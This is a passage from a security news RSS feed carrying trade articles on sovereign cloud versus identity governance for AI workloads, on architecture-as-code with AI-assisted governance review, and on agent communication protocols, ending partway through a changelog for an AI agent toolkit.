<link>https://tsecurity.de/de/3598569/it-security-nachrichten/sovereign-cloud-wont-fix-your-ai-risk-identity-governance-will/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598569/it-security-nachrichten/sovereign-cloud-wont-fix-your-ai-risk-identity-governance-will/</guid>
<pubDate>Mon, 15 Jun 2026 11:08:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Your board is asking. Your legal team is asking. Your auditors will be asking: Should AI workloads move to sovereign cloud, or stay on AWS, Azure or GCP? European enterprises have already run this experiment — under real regulatory pressure, with real money and real consequences. Many discovered that sovereign cloud alone didn’t deliver the control they expected. The real control point turned out to be somewhere else entirely.</p>



<p>Europe ran this experiment first, under regulatory pressure US enterprises are only starting to feel. With DORA fully in force since January 2025, NIS2 enforcement underway across EU member states and the EU AI Act’s high-risk system provisions taking effect in August 2026, European enterprises — particularly in financial services, critical infrastructure and manufacturing — have spent two years migrating workloads, renegotiating contracts and writing sovereign cloud into board-level risk frameworks. The hyperscalers responded. AWS launched its European Sovereign Cloud in January 2026. Microsoft and Google followed with their own sovereignty offerings. The market arrived.</p>



<p>US enterprises are not far behind. <a href="https://www.sec.gov/newsroom/speeches-statements/gerding-cybersecurity-disclosure-20231214">The SEC’s cybersecurity disclosure rules</a>, <a href="https://www.cisa.gov/resources-tools/resources/principles-secure-integration-artificial-intelligence-operational-technology">CISA’s AI security guidance</a>, proposed state-level AI regulations and growing board-level scrutiny of AI governance are creating comparable pressures on this side of the Atlantic. If your organization runs AI workloads on behalf of EU clients, operates EU subsidiaries or simply faces the question of where sensitive AI training data and model outputs should live — you are already in this conversation. The European experience is your preview.</p>



<p>What has not arrived is clarity on what you actually get — and what you do not. At the <a href="https://www.kuppingercole.com/events/eic2026/agenda">European Identity and Cloud Conference</a> in Berlin this May, the mood among practitioners had shifted measurably from previous years. The cheering for the sovereign cloud concept was over. What was happening on stage and in the corridors was a careful, sometimes uncomfortable, dissection of the gap between marketing slides and operational reality. (<a href="https://www.kuppingercole.com/events/eic2027">EIC returns to Berlin in May 2027</a>.)</p>



<p>The conference agenda made the shift visible. Where previous years centered on sovereign cloud architecture and vendor selection, the 2026 program’s trending themes — as mapped in the closing session — were AI security, identity fabric, workload identity management, and crypto agility. Sovereign cloud had become assumed infrastructure. The practitioner conversation had moved to what you build on top of it, and who controls that layer.</p>



<p>Martin Kuppinger, distinguished analyst and co-founder of KuppingerCole, observed the same shift: “Cloud sovereignty had a much larger role at this year’s EIC, with a differentiated discussion about whether and where it is needed. There is common sense that sovereignty is not a value in its own right — the required level depends on the use case and a proper risk assessment. There is no binary model for sovereignty.”</p>



<p><em>Sovereign cloud, on the slides, looks like control. In the contracts, service matrices and AI agent deployments, it often looks more like a very expensive illusion.</em></p>



<h2 class="wp-block-heading">The control question nobody answers clearly</h2>



<p>When enterprises talk about sovereign cloud, they are usually thinking about data residency — where the data lives. European data center, European jurisdiction. But data residency is the beginning of the conversation, not the end.</p>



<p>The harder questions are about control. Who holds the encryption keys, and who can compel access to them under what legal circumstances? Who sees the metadata, the access logs, the telemetry from your workloads? When you run AI inference or model training on a sovereign cloud platform, who controls the model registry, the training data pipeline, the output logs? And when an AI agent acts autonomously on your behalf — scheduling workloads, provisioning resources, making access decisions — whose infrastructure is that agent running on, and who can observe what it does?</p>



<p>These are not hypothetical concerns. <a href="https://www.congress.gov/bill/115th-congress/house-bill/4943/text">The CLOUD Act of 2018</a> gives US authorities the ability to compel US companies to produce data stored abroad, regardless of where the servers sit. European sovereign cloud offerings from US hyperscalers are structured to address this — through operational separation, European legal entities and customer-managed keys — but the structures are new, partially tested and vary significantly between providers.</p>



<p>Germany’s BSI has raised the stakes further. In April 2026, the agency published its <a href="https://www.bsi.bund.de/EN/Themen/Unternehmen-und-Organisationen/Informationen-und-Empfehlungen/Empfehlungen-nach-Angriffszielen/Cloud-Computing/C3A/C3A_node.html">Criteria Enabling Cloud Computing Autonomy (C3A)</a>: The first framework to operationalize what cloud sovereignty actually means in technical terms, including disconnect scenarios, staff residency requirements and an extraordinary provision for federal takeover of cloud operations in defense scenarios. Formally non-binding, the criteria are widely expected to become the de facto benchmark for German federal procurement — and a likely template for EU-level frameworks now in the legislative pipeline. For US CISOs, the direction of travel is clear: Regulatory definitions of cloud sovereignty are tightening, and the gap between “data in Europe” and “operationally sovereign” is only going to widen.</p>



<h2 class="wp-block-heading">Identity is where sovereignty actually lives</h2>



<p>The clearest theme at EIC 2026 was that identity — not network perimeter, not data residency — is where cloud sovereignty either holds or breaks down. The argument is becoming hard to avoid.</p>



<p>Jason Keenaghan, who leads identity management strategy at Thales, framed it directly: “Identity is shifting from an IT function to a regulated infrastructure. The most important question for the next decade will be: Who is in control?”</p>



<p>For a US CISO, this shift is very real: Identity governance is moving from pure IT plumbing to a regulated control surface that auditors, regulators and even enterprise customers in RfPs will increasingly scrutinize. The question of “who is in control” is no longer philosophical. It is contractual.</p>



<p>Here’s the problem. You can put your data in a Frankfurt data center with customer-managed keys. But if your identity governance is weak — if you do not know which human users, service accounts and AI agents have access to what, and under what conditions — your sovereignty posture is only as strong as your weakest identity. A compromised privileged account does not care about data residency.</p>



<p>This is particularly acute for AI workloads. Agentic AI systems — models that act autonomously, make API calls, provision resources, access data — are creating a new category of non-human identities that most enterprises’ IAM systems were never designed to manage. Consider a concrete example I have seen in client environments: An LLM-based deployment agent with standing access to production Kubernetes clusters. It schedules workloads, provisions resources and makes access decisions autonomously. If that agent runs on sovereign cloud infrastructure but its identity — its credentials, its permissions, its audit trail — is not properly governed, your sovereignty posture is exactly as strong as the weakest link in that agent’s access chain. If you are running similar agents in US-based cloud regions today, the same identity blind spots exist — even if you never touch a sovereign cloud region.</p>



<p>Sebastian Rohr, an IAM consultant and IDPro member who has spent two decades on enterprise identity architectures, distilled the requirements for governing AI agents in practice: “Every agent needs an assigned non-human identity. A solid on-behalf-of delegation model must be established. An audit trail via SIEM integration is required. No long-lived credentials, no API keys — only ephemeral credentials. Context-based authentication and fine-grained access control. Agents must be managed as real identities. And once that foundation exists: Risk-based, continuous re-authentication combined with the ability for real-time revocation. Do we have all these capabilities everywhere today? Not necessarily — but designing the architecture for it? That is entirely possible.”</p>



<p>For AI agents in particular, the practical question is this: Can you list every agent running in your environment, govern its entitlements and revoke access in real time? If not, you do not truly control the workload — regardless of which cloud region it runs in.</p>



<p>What practitioners at EIC kept coming back to is not a sovereign cloud answer. It is an identity governance answer. Sovereign cloud buys you legal protection and data residency. Identity governance gives you operational control — and increasingly, it is the layer where AI workload sovereignty actually has to be enforced.</p>



<h2 class="wp-block-heading">When sovereign cloud is worth it — and when it is not</h2>



<p>For US CISOs managing EU operations, EU subsidiaries or EU customers, the practical question is not whether sovereign cloud is philosophically correct. It is whether the additional cost and complexity deliver sufficient risk reduction for specific workloads. Most organizations I have worked with are over-applying sovereign cloud to workloads that do not need it, while under-applying it to the ones that do.</p>



<p>A working framework, refined across two years of European deployments. Use this as a quick triage for which workloads truly justify a sovereign cloud premium. As Kuppinger puts it: “Within an organization, varying levels of sovereignty demand for different use cases are the norm, not the exception.”</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Workload type</strong></td><td><strong>Sovereign cloud?</strong></td><td><strong>Why</strong></td></tr></thead><tbody><tr><td>NIS2-regulated processes</td><td><strong>Yes</strong></td><td>Legal obligation, board-level personal liability</td></tr><tr><td>High-risk AI under EU AI Act</td><td><strong>Yes</strong></td><td>Compliance from August 2026</td></tr><tr><td>Personal data with Schrems II exposure</td><td><strong>Yes</strong></td><td>Transfer risk without adequate protection</td></tr><tr><td>Sensitive metadata (access logs, AI telemetry)</td><td><strong>Yes</strong></td><td>Residency alone does not protect metadata</td></tr><tr><td>Dev/test environments</td><td>No</td><td>Significant cost premium (15–30%) with minimal risk reduction for most US-based operations</td></tr><tr><td>Non-sensitive SaaS workloads</td><td>No</td><td>Standard DPAs and encryption are usually sufficient; no strong US or EU regulatory driver</td></tr><tr><td>Internal productivity tools</td><td>No</td><td>No material regulatory exposure; high cost not justified by risk profile</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Five things European enterprises learned the hard way</h2>



<ul class="wp-block-list">
<li><strong>Sovereign cloud does not mean the hyperscaler cannot see your metadata. </strong>Customer-managed keys protect data at rest. They do not prevent the platform from logging access patterns, API calls and resource consumption. Know what your provider logs and where those logs go. For US CISOs: This matters for any hyperscaler operating under foreign data localization requirements you may face as the regulatory landscape evolves.</li>



<li><strong>Early sovereign cloud offerings had real service gaps — and exit is harder than expected. </strong>Many advanced AI/ML services were unavailable at launch; enterprises that committed early ended up running hybrid architectures more complex than anticipated. And lock-in in sovereign cloud contexts is harder to escape than standard cloud. Build exit strategy into procurement decisions before you sign.</li>



<li><strong>Identity governance cannot be deferred. </strong>The enterprises that got the most value from sovereign cloud investments had already done the identity governance work — asset inventory, access classification, non-human identity management. For US CISOs facing similar AI governance and resilience requirements: This is the lesson that will hurt most if you have not done the work.</li>



<li><strong>Sovereign from a hyperscaler is not the same as sovereign from a European provider. </strong>AWS European Sovereign Cloud, Microsoft Cloud for Sovereignty and Google Sovereign Cloud are structurally different from offerings built by IONOS, Hetzner, OVHcloud or Deutsche Telekom. The former offers broader service catalogs with sovereignty controls layered on. The latter offer cleaner legal structures with narrower feature sets. Neither is universally better — and the choice should follow workload characteristics, not procurement preference.</li>
</ul>



<h2 class="wp-block-heading">What US CISOs should do now</h2>



<p>If your organization has EU operations, subsidiaries or customers — or AI workloads sensitive enough that the regulatory direction in the US matters — these are decisions you will face. Three concrete steps.</p>



<p><strong>1. Classify your workloads by sensitivity and regulatory exposure before you classify them by cloud type. </strong>Not everything needs sovereign cloud. But know which workloads do before a regulator, auditor or customer’s procurement team asks.</p>



<p><strong>2. Audit your identity governance posture before your cloud strategy. </strong>Sovereign cloud without IAM maturity is expensive and insufficient. Governance has to happen at the identity layer, not the data center boundary.</p>



<p><strong>3. Read the contracts carefully. </strong>Key management, metadata logging, law enforcement access and service continuity provisions vary significantly between providers. Legal and security need to review them together — and AI workload provisions deserve their own column.</p>



<p>Europe’s sovereign cloud experiment is still running. The early results suggest the regulatory pressure is real, the market response is genuine and the operational complexity is higher than the marketing suggested. AI workloads make it more complex, not less. That is not a reason to avoid sovereign cloud — it is a reason to approach it with clearer eyes than the first wave of European adopters had. Buy the jurisdiction. Then govern the identity. In that order.</p>



<p><em>Sovereign cloud buys you a jurisdiction. Identity governance buys you control. AI workloads need both, and most enterprises are buying only one.</em></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Architecture-as-code is the next frontier for enterprise governance]]></title>
<description><![CDATA[Enterprise architecture governance has always carried a difficult mandate: helping organizations move faster without allowing technology decisions to fragment, duplicate or create unacceptable risk. In large enterprises, that mandate is usually executed through review boards, standards, approved ...]]></description>
<link>https://tsecurity.de/de/3598568/it-security-nachrichten/architecture-as-code-is-the-next-frontier-for-enterprise-governance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598568/it-security-nachrichten/architecture-as-code-is-the-next-frontier-for-enterprise-governance/</guid>
<pubDate>Mon, 15 Jun 2026 11:08:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Enterprise architecture governance has always carried a difficult mandate: helping organizations move faster without allowing technology decisions to fragment, duplicate or create unacceptable risk. In large enterprises, that mandate is usually executed through review boards, standards, approved patterns, reference architectures and experienced architects’ judgment. These mechanisms remain necessary, especially in regulated environments, but are increasingly strained by cloud adoption, AI systems, managed services, data platforms and continuous delivery.</p>



<p>Most organizations do not lack architectural intent. They have security standards, cloud patterns, integration principles, data-classification policies, resilience expectations, review forums and exception processes. Too much of this intent remains trapped in documents, slide decks, meeting notes and expert interpretation. That model can work when architecture change is episodic, but it becomes harder to scale when teams are continuously changing APIs, cloud configurations, data flows, identity patterns, observability settings, dependencies and third-party service integrations.</p>



<p>Architecture-as-code offers a different operating model. Instead of treating architectural standards as documents to be interpreted manually, it treats architectural intent, approved patterns, evidence requirements, exceptions and review outcomes as machine-readable artifacts that can be versioned, evaluated, tested and observed. The goal is not to reduce enterprise architecture to infrastructure-as-code, but to make architectural constraints and evidence expectations executable enough to participate in the software delivery lifecycle.</p>



<p>The idea has parallels in software architecture and platform engineering. <a href="https://www.thoughtworks.com/insights/podcasts/technology-podcasts/architecture-as-code" rel="nofollow">Thoughtworks has discussed architecture-as-code</a> in the context of fitness functions, while the evolutionary architecture community has used fitness functions as automated checks that preserve architectural characteristics as systems evolve. The next step is applying similar thinking to enterprise architecture governance.</p>



<h2 class="wp-block-heading">From point-in-time review to continuous architecture assurance</h2>



<p>In many enterprises, architecture governance is still organized around a point-in-time review model. A team prepares a design package, presents it to an architecture review board, receives feedback, records decisions or exceptions, and proceeds into delivery. This model remains useful when a system is new, high-risk or materially changing because it creates a forum for judgment, enterprise alignment, risk acceptance and trade-offs.</p>



<p>Its weakness is that software systems do not remain static after the review meeting. APIs change, authentication patterns evolve, cloud services are added, data flows expand, observability settings drift and implementation details diverge from original design assumptions. In traditional governance models, that drift often becomes visible only during a later review, an audit, a production incident or a security assessment.</p>



<p>Architecture-as-code creates the possibility of moving from episodic review to continuous architecture assurance. The analogy is automated testing. Software teams did not eliminate human judgment about quality, but they moved repeatable checks into the delivery pipeline so regressions could be detected earlier and more consistently. Architecture governance can follow a similar pattern: review boards should still handle judgment, trade-offs, exceptions and accountability, while basic conformance checks become executable and repeatable across the software lifecycle.</p>



<p>This is not a purely theoretical direction. <a href="https://www.thoughtworks.com/en-ca/insights/books/building-evolutionaryarchitectures-second-edition" rel="nofollow">The second edition of <em>Building Evolutionary Architectures</em></a> explicitly connects fitness functions with the automation of architectural governance, while <a href="https://www.openpolicyagent.org/docs/cicd" rel="nofollow">Open Policy Agent</a> provides a well-established policy-as-code precedent for enforcing rules across microservices, Kubernetes, API gateways and CI/CD pipelines. In both cases, the underlying lesson is similar: when important system properties can be expressed as executable checks, governance can move closer to the point where change happens.</p>



<p>In practice, this means architecture evidence can be evaluated when a design brief changes, when an OpenAPI specification is updated, when infrastructure configuration is modified, when a pull request introduces a new dependency or when a service is promoted toward release. The goal is not to turn architecture governance into a rigid gate for every code change. It is to make architectural drift more visible and to surface evidence gaps before they become late-stage delivery risks.</p>



<h2 class="wp-block-heading">A governance workflow for software delivery</h2>



<p>A practical architecture-as-code workflow should sit inside the software delivery lifecycle, not outside it. It should not wait until a final review meeting to discover basic gaps. It should evaluate architecture evidence as part of design iteration, pull requests, CI/CD runs, release readiness checks and periodic posture reviews.</p>



<p>This structure is deliberately layered. Deterministic controls handle what should be deterministic. Human review handles what requires accountability and judgment. AI assists with interpretation and review preparation, but it does not own the decision.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/architecture-as-code-in-the-sdlc.png?w=1024" alt="Architecture-as-code in the SDLC" class="wp-image-4184574" width="1024" height="572" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Nitesh Varma</p></div>



<p>Figure 1: Architecture-as-code embeds governance into the software delivery lifecycle. Design intent and implementation evidence are evaluated through deterministic controls, interpreted by AI-assisted review, and returned to human architects for judgment, exceptions and risk acceptance.</p>



<p>The critical move is comparing what a team claims architecturally with what the implementation evidence shows. Many governance processes rely too heavily on what the design package says. A team may declare that a public API uses an approved identity pattern, that sensitive data is classified, that observability requirements are met or that a threat model exists. Those claims may be accurate, but they still need supporting evidence.</p>



<p>A stronger model compares declared intent with observable implementation signals. If a design brief says a public API uses OAuth/OIDC, but the OpenAPI specification defines an API-key security scheme, the governance issue is not simply that authentication failed. It is that implementation evidence does not support the declared architecture intent. The team may need to update the implementation, correct the design brief or submit a time-bound exception with compensating controls.</p>



<p>Similarly, if a public webhook has proper authentication evidence but no threat model or architecture decision record, the right conclusion may be “needs more evidence,” not “non-compliant.” Governance should distinguish between direct control violations, missing evidence, incomplete documentation, contextual risk and passed controls. That classification makes governance more useful to engineering teams and more defensible to security, risk, audit and compliance.</p>



<h2 class="wp-block-heading">The role of AI: interpretation, not authority</h2>



<p>The rise of agentic AI makes architecture-as-code more interesting, but also more dangerous if framed poorly. The wrong framing is that AI will automate the architecture review board. That would be naïve. Architecture approval involves accountability, risk acceptance, organizational priorities, cost, regulatory obligations, delivery sequencing and long-term platform direction. Those are not decisions that should be delegated to an LLM.</p>



<p>AI’s more credible role is downstream of deterministic evaluation. Once controls-as-code have produced findings, an AI-assisted governance layer can interpret them, draft remediation guidance, identify review questions and prepare an architecture review narrative. It can help architects distinguish hard violations, evidence gaps, design-implementation mismatches and possible exception candidates.</p>



<p>For example, a deterministic control engine might produce the following result:</p>



<pre class="wp-block-code"><code>AUTH-001: Claim/evidence mismatch
Design brief declares OAuth/OIDC.
OpenAPI implements API key.
Outcome: human review required.
CI action: require review.</code></pre>



<p>An AI-assisted governance layer can turn that into a more useful review narrative:</p>



<p><em>The primary governance concern is that the implementation evidence contradicts the declared authentication pattern. Before this design can proceed, the team should either align the OpenAPI specification and implementation with the approved OAuth/OIDC pattern or submit a time-bound exception with compensating controls. The missing threat model and incomplete observability evidence further prevent the package from being approval-ready.</em></p>



<p>The AI is not deciding the outcome; it is preparing the human review.</p>



<p>The same AI layer can perform a reflection pass, checking whether its narrative overstated a finding, softened a deterministic failure, confused missing evidence with confirmed non-compliance or introduced unsupported claims.</p>



<p>To make that separation concrete, I built a small architecture-as-code sandbox using bounded API governance scenarios. It is not a production governance platform. It is a working demonstration of the operating pattern: design intent is declared, implementation artifacts provide evidence, controls-as-code evaluate the package, a deterministic policy gate assigns a bounded posture, AI assists with interpretation and human architects remain accountable.</p>



<p>A project registry points to design briefs, OpenAPI specifications, architecture decision records, threat models and evidence files. Controls then evaluate whether the declared design intent is supported by the actual implementation artifacts.</p>



<p>The most useful sample case was a public customer-profile API where the design brief declared OAuth/OIDC, but the OpenAPI specification implemented API-key authentication. The deterministic engine classified this as a claim-evidence mismatch, assigned the case to human review and generated remediation guidance. The AI-assisted layer then produced a review narrative and reflection check but did not change the outcome.</p>



<p>Other samples exercised different governance postures. A public webhook with authentication but no threat model or architecture decision record produced “needs more evidence,” while a public API with no authentication produced “does not meet standard.” These distinctions matter because enterprise architecture governance should not treat every gap as the same kind of issue.</p>



<h2 class="wp-block-heading">Architecture governance becomes part of delivery</h2>



<p>One important implication is that architecture governance becomes observable. A review is no longer just a meeting, a diagram or a document attached to a ticket. It becomes a run with inputs, controls, evidence, findings, policy outcome, remediation guidance and review artifacts. In the sandbox, I used <a href="https://mlflow.org/docs/latest/ml/tracking/" rel="nofollow">MLflow</a> as a lightweight run ledger to capture governance metrics and review artifacts for later inspection.</p>



<p>This does not eliminate formal approvals, but it gives them a stronger evidence base and useful operating history. Architecture leaders could see which controls fail most often, where evidence is frequently missing, which patterns generate exceptions and where standards may be unclear.</p>



<p>This matters even more as organizations adopt AI systems, which increase the need for architectural discipline around data flows, observability, model interactions, security boundaries, policy constraints, operational ownership and runtime monitoring. If governance remains manual and episodic, it will struggle to keep pace. If it becomes executable and observable, it can become part of the delivery system.</p>



<p>The danger is automated governance theater. A system can generate polished reports, plausible AI narratives and dashboards while still resting on vague standards or incomplete evidence. Automation does not fix unclear architecture principles. AI does not compensate for missing accountability. A policy gate is only useful if the underlying controls are meaningful.</p>



<p>Enterprises should therefore treat architecture-as-code as an operating-model change, not just a tooling pattern. The model works only when standards, approved patterns, evidence expectations and exception processes are explicit enough to be evaluated consistently. Exceptions need owners, expiry dates and rationale; deterministic controls need to remain separate from AI interpretation; and human accountability must remain visible throughout the process.</p>



<p>This is why the agentic AI layer should be bounded. It can summarize, interpret, critique, prepare review materials, propose architecture board questions and identify missing artifacts. But it should not override policy gates or approve high-risk designs. The stronger architecture is one in which deterministic controls produce the governance posture, AI explains it and humans decide what to do.</p>



<p>The strategic shift is that architecture governance can move closer to the rhythm of software delivery. Not every architecture concern becomes a CI/CD rule, and many decisions will still require judgment, negotiation and risk acceptance. But many governance signals can be surfaced earlier, more consistently and with better evidence.</p>



<p>The goal is not to replace the architecture review board with software. It is to ensure that architecture review is no longer confined to a single meeting, a static document or a one-time approval. Like automated testing, architecture governance should become a repeatable signal that travels with the system as it changes.</p>



<p>Architecture-as-code creates the foundation, agentic AI adds a reasoning and narrative layer, CI/CD provides the control point, run logging provides observability and human review preserves accountability.</p>



<p>As systems become more distributed, cloud-based, AI-enabled and continuously delivered, enterprise governance cannot depend on static standards and periodic reviews alone. Architecture-as-code offers a path toward governance that is executable, evidence-driven, observable and accountable to human judgment.</p>



<p><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="nofollow"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="nofollow"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[MCP solved tool calling. A2A solved coordination. What solves transport?]]></title>
<description><![CDATA[The history of distributed computing is one of protocol proliferation followed by consolidation. Common Object Request Broker Architecture (CORBA), Distributed Component Object Model (DCOM), Java remote method invocation (RMI), and early simple object access protocol (SOAP) competed for the enter...]]></description>
<link>https://tsecurity.de/de/3597529/it-nachrichten/mcp-solved-tool-calling-a2a-solved-coordination-what-solves-transport/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597529/it-nachrichten/mcp-solved-tool-calling-a2a-solved-coordination-what-solves-transport/</guid>
<pubDate>Sun, 14 Jun 2026 21:18:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The history of distributed computing is one of protocol proliferation followed by consolidation. </p><p>Common Object Request Broker Architecture (CORBA), Distributed Component Object Model (DCOM), Java remote method invocation (RMI), and early simple object access protocol (SOAP) competed for the enterprise integration market in the late 1990s before representational state transfer (REST) quietly won by being simpler and HTTP-native. </p><p>Extensible Messaging and Presence Protocol (XMPP), Internet Relay Chat (IRC), and a dozen proprietary protocols fragmented real-time messaging before MG telemetry transport (MQTT) and WebSockets carved out their respective niches. Every new computing paradigm generates a burst of competing standards, then slowly converges as implementations accumulate and interoperability becomes economically necessary.</p><p>The AI agent ecosystem is currently in the proliferation phase. Four significant protocols have been published in the past eighteen months: Model context protocol (MCP) from Anthropic in late 2024, agent communication protocol (ACP) from IBM Research in March 2025, Agent2Agent (A2A) from Google in April 2025, and agent network protocol (ANP) from an independent working group. </p><p>The W3C AI Agent Protocol Community Group has opened a standards track. The Internet Engineering Task Force (IETF) is receiving Internet-Drafts on agent transport. Conferences are running workshops on interoperability. Every week brings a new GitHub repository claiming to solve the agent communication problem.</p><p>Understanding where and how quickly this converges has real consequences for architecture decisions being made right now.</p><h2><b>What the protocols actually solve</b></h2><p>The proliferation looks more chaotic than it is, because most of these protocols address different layers of a stack rather than competing for the same slot. The confusion comes from marketing, which describes each as "the standard for AI agent communication" without specifying which aspect of communication.</p><p>MCP is a tool-calling interface. It defines how a model discovers what functions a server exposes, how to invoke them, and how to interpret the response. It is a typed remote procedure call (RPC) contract between a model client and a tool server, running over HTTP. The Linux Foundation confirmed more than 10,000 active public MCP servers and 164 million monthly Python SDK downloads by April 2026. MCP has already won the tool-calling layer. The standardization work is effectively done.</p><p>A2A is a task coordination interface. Where MCP defines how an agent calls a tool, A2A defines how two agents delegate a task. It introduces Agent Cards (capability advertisements), task lifecycle states, and three interaction modes: Synchronous, streaming, and asynchronous. Google donated it to the Linux Foundation in June 2025, and enterprise AI teams have adopted it broadly because it fills a real gap that MCP leaves open.</p><p>ACP is a message envelope format. Lightweight, stateless, designed for agent-to-agent message exchange without A2A's full coordination semantics. It is useful in systems where simple message passing suffices and A2A's task lifecycle overhead is unnecessary.</p><p>ANP is a discovery and identity protocol. It uses Decentralized Identifiers (DIDs) for agent identity and JSON-LD graphs for capability descriptions, providing a foundation for decentralized agent marketplaces where no central registry is required.</p><p>The stack that is emerging: Capability discovery via ANP or simpler registries, task coordination via A2A, tool calls via MCP, and lightweight messaging via ACP for cases that do not require full task lifecycle management. These layers complement rather than compete.</p><h2><b>The transport problem that remains</b></h2><p>Every protocol in this list runs over HTTP. This reflects where the protocols came from: Research teams, API providers, and enterprise software companies building systems where HTTP is an unquestioned assumption. HTTP is the protocol they know, the one their servers already speak, and the one that makes demos easy.</p><p>The production problem is that HTTP assumes a reachable server. Behind network address translation (NAT) — and 88% of networked devices sit behind NAT — there is no reachable server without a relay. For agent fleets that need to route tasks directly between peers across cloud boundaries, home networks, and edge deployments, this centralization forces every message through relay infrastructure. Relay infrastructure adds latency, cost, and a failure mode.</p><p>The application-layer protocols solve the semantics of what agents say to each other. They do not solve how agents find each other and establish direct connections. That is a session-layer problem, Layer 5 in the open systems interconnection (OSI) model and none of MCP, A2A, ACP, or ANP address it.</p><p>The technologies for solving it exist. UDP hole-punching with session traversal utilities for NAT (STUN) provides NAT traversal for roughly 70% of network topologies. X25519 Diffie-Hellman and AES-256-GCM provide authenticated encryption at the tunnel level without a certificate authority. Quick UDP internet connections (QUIC) (RFC 9000) or custom sliding-window protocols over user datagram protocol (UDP) provide reliable delivery without TCP's head-of-line blocking. These are the same primitives that WireGuard uses for VPN tunnels and that WebRTC uses for browser-to-browser media streams.</p><p>What differs in the agent context is capability-based routing. Agents need to find peers not by hostname but by what those peers can do. A research agent should be able to query "which peers have real-time foreign exchange data?" and receive a list of currently active specialist agents. This is closer to a service registry than to DNS, and it is a natural extension of ANP's design philosophy applied to the transport layer.</p><p>A handful of projects are assembling these pieces. Pilot Protocol has the most complete published specification, with an IETF Internet-Draft covering addressing, tunnel establishment, and NAT traversal for agent networks. libp2p provides a battle-tested foundation with similar primitives. The IETF's QUIC working group is developing NAT traversal extensions that will be relevant here.</p><h2><b>What convergence will look like</b></h2><p>The HTTP-based protocols (MCP, A2A) are already converging on stable versions. The next 12 months will see production hardening, security improvements, stateless MCP servers for horizontal scaling, better A2A federation — rather than new fundamental designs. The tool-calling and task-coordination layers are largely solved.</p><p>The transport layer is 18 to 24 months behind. Expect a period of implementation diversity as teams experiment with different approaches to peer-to-peer (P2P) agent networking, followed by consolidation around a small number of implementations once empirical data on performance and reliability accumulates. The IETF and W3C standardization tracks will likely produce something in the 2027-2028 window, by which time one or two open-source implementations will have accrued enough production deployments to establish de facto standards ahead of the formal specification.</p><p>For engineering leaders making architecture decisions today, the practical implication is layered adoption. The application-layer protocols are stable enough to build on. MCP adoption now is low-risk. A2A adoption for multi-agent coordination is reasonable with the expectation that the protocol will evolve. The transport layer is where you either build something custom and plan to replace it, or you evaluate early implementations knowing the space is still moving.</p><p>The teams that will have the most leverage when the transport layer stabilizes are the ones that designed their agent systems with a clean separation between application semantics (MCP, A2A) and transport (whatever sits below). Clean separation is cheap to implement now and expensive to retrofit later, a lesson the microservices era taught anyone who tried to add observability or circuit breaking to systems that had none.</p><p><i>Philip Stayetski is a co-founder of Vulture Labs.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.12.4]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Fixed

Fixed remote compaction input trimming to use unlimited context when model.contextWindow is unset

@oh-my-pi/pi-ai
Added

Added GITLAB_CLIENT_ID and GITLAB_REDIRECT_URI env-var overrides for the GitLab Duo OAuth login flow so users running with their own GitLab OAut...]]></description>
<link>https://tsecurity.de/de/3595882/tools/v15124/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595882/tools/v15124/</guid>
<pubDate>Sat, 13 Jun 2026 18:24:20 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-agent-core</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed remote compaction input trimming to use unlimited context when <code>model.contextWindow</code> is unset</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added <code>GITLAB_CLIENT_ID</code> and <code>GITLAB_REDIRECT_URI</code> env-var overrides for the GitLab Duo OAuth login flow so users running with their own GitLab OAuth application can replace the bundled credentials when GitLab rejects the bundled <code>client_id</code>'s redirect URI. Setting <code>GITLAB_REDIRECT_URI</code> also disables the random-port fallback (strict OAuth providers reject mismatched URIs anyway). (<a href="https://github.com/can1357/oh-my-pi/issues/2424" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2424/hovercard">#2424</a>)</li>
<li>Added <code>AuthStorage.listStoredCredentials()</code> and <code>AuthStorage.removeCredential()</code> for per-account credential management.</li>
</ul>
<h3>Changed</h3>
<ul>
